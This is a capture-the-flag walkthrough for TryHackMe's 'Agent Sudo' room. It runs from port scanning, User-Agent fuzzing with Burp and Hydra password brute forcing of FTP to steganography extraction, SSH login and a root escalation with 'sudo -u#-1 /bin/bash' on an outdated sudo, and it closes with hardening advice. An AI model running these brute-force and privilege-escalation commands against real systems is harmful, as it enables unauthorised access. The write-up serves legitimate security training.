Agent Sudo CTF

URL:

Description:

Agent Sudo CTF is a CTF challenge found on the Try Hack Me website. This is an easy level room focused on modifying http headers, password bruteforce, steganography and sudo privileges.

Enumeration:

We start with a Rustscan_[1] to quickly find any available ports, with an Nmap report on the service versions found on the discovered ports.

sudo rustscan -a 10.10.236.116 -- -sV -sS -oN agentsudo_nmap.txt

The above scan is referencing the IP address to be scanned (10.10.236.116) and calling for the following parameters from Nmap_[2]:

Nmap Commands Overview:
-sV = Checks to see what the version is of the service running on the scanned ports.
-sS = Type of scan (SYN Scan) being used. Considered a slower and and more silent scan. However, due to me running this with rustscan (which is a loud scanner) there is no real advantage doing this. I am just use to it.
-oN = Saving the output to a text file I have named. This is so I can review the results later if necessary.

Results:

nmap -vvv -p 21,22,80 -sV -sS -oN agentsudo_nmap.txt 10.10.236.116
Nmap scan report for 10.10.236.116
Host is up, received echo-reply ttl 61 (0.29s latency).
Scanned at 2021-08-24 07:05:45 EDT for 10s

PORT	STATE	SERVICE	REASON	VERSION
21/tcp	open	ftp	syn-ack ttl 61	vsftpd 3.0.3
22/tcp	open	ssh	syn-ack ttl 61	OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp	open	http	syn-ack ttl 61	Apache httpd 2.4.29 ((Ubuntu))

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

We have found the machine has an FTP server, Web server hosted via Apache and has SSH enabled. First thing first, lets check to see if 'anonymous' is enabled on the FTP server.

ftp 10.10.236.116
Connected to 10.10.236.116.
220 (vsFTPd 3.0.3)
Name (10.10.236.116:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.

No luck. The FTP server does not allow for anonymous login, so lets now look at the website.

The instructions on the webpage inform us 2 things:

We are 'Agent' someone.
We are not 'Agent R'.

Now we need to try to figure out how to access this message on the system. User-agent_[3] is apart of a http header sent by a web browser that helps identify to the web-server who is accessing their web-server (E.g. Google crawlers, Wget, Chrome, FireFox, etc.). The message above is notifying us to modify the user-agent within the http header, and we should then get access to the message we require. Lets do this with Burpsuite_[4] and a wordlist of the alphabet:

We will send this intercepted header to intruder and perform a sniper attack on the webserver, fuzzing for the compromised agent.

We can see off the results that 'R' shows a viewable webpage and 'C' has a redirect. With the information known, we can assume the message was directed for Agent C.

We have a username of 'chris' and a weak password. With this information we can move to bruteforcing the account with Hydra_[5]. Considering there is an FTP server still yet to be compromised I will begin bruteforcing this service with the username 'chris'

hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.236.116 -V

The above command is instructing Hydra to perform the following:

Hydra Commands Overview:
-l = I am hardcoding the username to be used with the bruteforce. This is a set parameter.
-P = This is telling Hydra to use a wordlist for the password. This is a form of fuzzing and allows for the username 'chris' to be used against a number of different passwords.
ftp://10.10.236.116 = I am specifing the port to run the bruteforce against. As the FTP is on the default port we do not need to specify the port for this tool.
-V = Verbose the attack so I can ensure it is running correctly during operation.

Result:

[21][ftp] host: 10.10.236.116 login: chris password: crystal

Username:Password

chris:crystal

We now have access to the FTP server.

ftp 10.10.236.116
Connected to 10.10.236.116.
220 (vsFTPd 3.0.3)
Name (10.10.236.116:kali): chris
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.

-rw-r--r--	1	217	Oct 29 2019	To_agentJ.txt
-rw-rw-r--	1	33143	Oct 29 2019	cute-alien.jpg
-rw-r--r--	1	34842	Oct 29 2019	cutie.png

226 Directory send OK.

Lets download and view the files.

ftp> get To_agentJ.txt
local: To_agentJ.txt remote: To_agentJ.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for To_agentJ.txt (217 bytes).
226 Transfer complete.
217 bytes received in 0.00 secs (1.8153 MB/s)
ftp> get cute-alien.jpg
local: cute-alien.jpg remote: cute-alien.jpg
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for cute-alien.jpg (33143 bytes).
226 Transfer complete.
33143 bytes received in 0.59 secs (55.3043 kB/s)
ftp> get cutie.png
local: cutie.png remote: cutie.png
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for cutie.png (34842 bytes).
226 Transfer complete.
34842 bytes received in 0.58 secs (58.6397 kB/s)

Viewing the contents of To_agentJ.txt:

cat To_agentJ.txt
Dear agent J,

All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.

From,
Agent C

The data is being hidden via steganography in one of the 2 images. As we are dealing with JPG and PNG files, the way the data has been embedded within these files will be different resulting in different tools needed to crack this. We will start with cute-alien.jpg and use the tool Stegseek_[6].

stegseek cute-alien.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "Area51"
[i] Original filename: "message.txt".
[i] Extracting to "cute-alien.jpg.out".

cat cute-alien.jpg.out
Hi james,

Glad you find this message. Your login password is hackerrules!

Don't ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy,
chris

We now have a username and password to log into the SSH service.

Username:Password

james:hackerrules!

Resources:

[1]https://rustscan.github.io/RustScan/
[2]https://nmap.org/book/man.html
[3]https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/User-Agent
[4]https://portswigger.net/burp
[5]https://www.thc.org/thc-hydra/
[6]https://github.com/RickdeJager/stegseek

Compromise:

With the username and password known, we can log into the server via SSH.

ssh james@10.10.236.116
james@10.10.236.116's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

* Documentation:	https://help.ubuntu.com
* Management:	https://landscape.canonical.com
* Support:	https://ubuntu.com/advantage

System information as of Tue Aug 24 13:27:16 UTC 2021

System load:	0.0	Processes:	97
Usage of /:	40.1% of 9.78GB	Users logged in:	0
Memory usage: 39%	IP address for eth0: 10.10.236.116
Swap usage:	0%

75 packages can be updated.
33 updates are security updates.

Last login: Tue Oct 29 14:26:27 2019
james@agent-sudo:~$ id
uid=1000(james) gid=1000(james) groups=1000(james),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

Success. Now we can grab the user flag.

james@agent-sudo:~$ ls -la
total 80

drwxr-xr-x	4	james	james	4096	Oct 29 2019	.
drwxr-xr-x	3	root	root	4096	Oct 29 2019	..
-rw-r--r--	1	james	james	42189	Jun 19 2019	Alien_autospy.jpg
-rw-------	1	root	root	566	Oct 29 2019	.bash_history
-rw-r--r--	1	james	james	220	Apr 4 2018	.bash_logout
-rw-r--r--	1	james	james	3771	Apr 4 2018	.bashrc
drwx------	2	james	james	4096	Oct 29 2019	.cache
drwx------	3	james	james	4096	Oct 29 2019	.gnupg
-rw-r--r--	1	james	james	807	Apr 4 2018	.profile
-rw-r--r--	1	james	james	0	Oct 29 2019	.sudo_as_admin_successful
-rw-r--r--	1	james	james	33	Oct 29 2019	user_flag.txt

james@agent-sudo:~$ cat user_flag.txt
REDACTED

Privilege escalation:

Now that we have compromised the user account we can now focus on privilege escalation. As we know the user's password, we could see if this user account has any sudo privileges

james@agent-sudo:~$ sudo -l
[sudo] password for james:
Matching Defaults entries for james on agent-sudo:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on agent-sudo:
(ALL, !root) /bin/bash
james@agent-sudo:~$ sudo --version
Sudo version 1.8.21p2

sudo -l is stating that we can run /bin/bash_[7] as anyone but root. The problem with the version of sudo on the machine is that it is out of date and has a known bug where the user can specify the id '-1'_[8] which will default to 0 within sudo. This allows for the user to default straight to root, bypassing the !root restriction. To exploit this we will run the following code:

james@agent-sudo:~$ sudo -u#-1 /bin/bash
root@agent-sudo:~# id
uid=0(root) gid=1000(james) groups=1000(james)

Now we have root we can grab the root flag:

root@agent-sudo:~# cat /root/root.txt
To Mr.hacker,

Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.

Your flag is
REDACTED

By,
DesKel a.k.a Agent R

Resources:

[7]https://gtfobins.github.io/gtfobins/bash/
[8]https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-less-than-v-1-28

Hardening:

To prevent his machine from being compromised in future the following policies should be enforced:

Enforce all users to use more complex/longer passwords. It has been found that the longer a password is the harder and longer it takes for a machine to bruteforce it.
Update sudo to remove the known binary exploit, helping to further restrict the users access on the device and enfocring the policy set with sudo.

Conclusion:

Through this challenge we have learnt a little on steganography within JPG files, the reason why strong passwords are a necessesity and to alwasy keep our services and binaries up to date on our systems. I hope you have enjoyed and maybe learnt something new within this guide. Thank you for reading through my walkthrough of Agent Sudo CTF